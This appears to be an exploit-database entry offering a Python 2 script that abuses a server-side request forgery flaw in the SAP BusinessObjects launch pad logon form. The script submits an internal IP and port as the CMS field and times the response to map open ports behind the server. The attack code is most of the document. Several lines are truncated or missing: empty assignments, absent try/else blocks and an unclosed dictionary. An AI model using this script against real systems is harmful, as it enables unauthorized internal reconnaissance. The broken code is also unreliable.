SAP BusinessObjects launch pad - Server-Side Request Forgery

ID EXPLOITPACK:8F2B147C103011E3E4A03368AB06C7F3
Type exploitpack
Reporter Ahmad Mahfouz
Modified 2017-12-27T00:00:00


SAP BusinessObjects launch pad - Server-Side Request Forgery

                                            # Exploit Title: SAP BusinessObjects launch pad SSRF
# Date: 2017-11-8
# Exploit Author: Ahmad Mahfouz
# Category: Webapps
# Author Homepage:
# Description: Design Error in SAP BusinessObjects launch pad leads to SSRF attack 

#!/usr/bin/env python
# SAP BusinessObjects launch pad SSRF Timing Attack Port scan
# usage : http://path.faces targetIP targetPort
import urllib2
import urllib
import ssl
from datetime import datetime
import sys


if len(sys.argv) != 4:

   print "Usage: python http://path.faces targetIP targetPort"

url = sys.argv[1]
targetIP = sys.argv[2]
targetPort = sys.argv[3]
targetHostIP = "%s:%s" %(targetIP,targetPort)
print "\r\n" 
print "[*] SAP BusinessObjects Timing Attack"
headers = {'User-Agent': 'Mozilla/5.0'}
gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)


   request = urllib2.Request(url, headers=headers)
   page = urllib2.urlopen(request, context=gcontext)
   print "[*] Connected to SAP Bussiness Object %s"  %url


   print "[-] Failed To connect to SAP Bussiness Object %s" %url
   print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"

resheaders =
cookie = resheaders.dict['set-cookie']
content = page.readlines()

for line in content:

   if "com.sun.faces.VIEW" in line:
      sfview = line.split("=")[4].split("\"")[1]
      print "[*] Got java faces dynamic value"


if not sfview:

   print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??"

formdata = {"_id0:logon:CMS":targetHostIP,


data_encode = urllib.urlencode(formdata)
start =
print "[*] Testing Timing Attack %s" %start        
request = urllib2.Request(url,data_encode)
request.add_header('Cookie', cookie)
response  = urllib2.urlopen(request)
end =
the_page =

if "FWM" in the_page:
   elapsedTime = end-start
   if elapsedTime.total_seconds() >= 10:

      print "[*] Port %s is Open, Gotcha !!! " %targetPort


      print "[*] Port %s is Closed , we die fast"  %targetPort

elif "FWC" in the_page:

   print "[-] error login expired"